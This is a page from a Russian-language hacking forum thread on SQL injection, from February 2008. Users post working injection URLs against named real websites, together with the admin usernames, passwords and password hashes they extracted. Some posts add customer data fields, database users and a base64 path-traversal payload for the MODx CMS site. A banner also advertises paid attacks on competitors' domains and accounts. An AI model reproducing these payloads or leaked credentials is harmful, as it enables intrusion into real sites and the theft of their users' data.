SQL Инъекции — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 468 из 1602

468

Опции темы

Поиск в этой теме

Опции просмотра

13.02.2008, 08:43

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Код:

http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users/*

http://www.job.khit.info/administrator/
admin:40b5bf20806a044392ea48bc5c436262

SQL Инъекция в Joomla/Mambo Component Job (com_job), нашел я, но сайтов больше с такой инъекцией не нашел.

еще таблицы на этом домене (другие движки)

Код:

http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*

13.02.2008, 09:31

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

Провел на форуме:
3818187

Репутация: 369

Код HTML:

http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.pinfosystems.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.marketinginstyle.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.mangsidig.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.minet-services.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.sonicracingteam.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.g-linq.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users+limit+1/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.regionaleartiesten.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.rstasarim.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.tribudefilles.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.open-business.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

PS Начинаем утреннею зарядку =)))

13.02.2008, 10:39

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Mambo Component Events SQL Injection

Код:

http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*

http://www.nwen.org/administrator/
admin;admin

Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/

Последний раз редактировалось it's my; 13.02.2008 в 10:41..

13.02.2008, 12:44

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
dbname = www
dbuser =www@localhost
dbversion =4.0.20

13.02.2008, 15:39

BizzyD

Участник форума

Регистрация: 02.06.2007

Сообщений: 210

Провел на форуме:
1172175

Репутация: 252

Код:

http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*

wwwnov@localhost:law:4.0.27-1-log

Код:

http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4,5,6/*

dbheal@linhostssl16.prod.mesa1.secureserver.net:db heal:4.0.27-max-log

Код:

http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*

u10744@10.10.153.160:u10744:5.0.45-log

Код:

http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*

zrim@localhost:betonmaster:4.1.22-log

Код:

http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*

roundcube:583e2e1b2957e824

13.02.2008, 15:45

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user, 0x3a,password)+from+mysql.user/*

admin:40e369d51c6bd8e2
pma_WHy8zYQ73Zhn:1c4230400a8e14af
horde:234994c1665bd570
nl_star:270037157a74bbe3
nl_star_django:2490e08f0895cc0b

:PPPPPPP

13.02.2008, 16:41

db_reader

Новичок

Регистрация: 23.01.2008

Сообщений: 15

Провел на форуме:
20588

Репутация: 63

www.davisvisitor.com

_http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5/*

4.0.16:dvb@localhost:dvb

Ни одной таблицы не смог подобрать. Если кто сможет-отпишите плз...

13.02.2008, 18:24

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

http://www.modxcms.com
Официальный сайт CMS MODx

Существует иньекция и возможность скачать любые файлы с сайта.
Пример ссылки:

Код:

http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q

Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
1|2|repo_dcount|3|blabla.txt
1. - путь к файлу
2. - уязвимый параметр для SQLinj
3. - имя файла который хотим скачать
пример:
../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
--------------------------------------------------
не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....

Последний раз редактировалось big_BRAT; 13.02.2008 в 18:26..

13.02.2008, 20:26

rankor777

Познающий

Регистрация: 11.01.2008

Сообщений: 42

Провел на форуме:
95213

Репутация: 49

Код:

http://www.alparysoft.ru/products.php?id=10&item=14+union+select+1,2,3,4,5,6,7,8,9,10,version,12,13,14,15,16,17,18,19,20,21,22,23/*

#10

13.02.2008, 18:21

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

дерзаем

Цитата:

http://www.rugbysport.com/customer_testimonials.php?testimonial_id=7599999
/**/union/**/select/**/1,2,concat(customers_lastname,0x3a,customers_passw ord,%200x3a,customers_email_address),4,5,6,7,8/**/from/**/customers/*

Таблицы
counter

Последний раз редактировалось kair; 13.02.2008 в 18:34..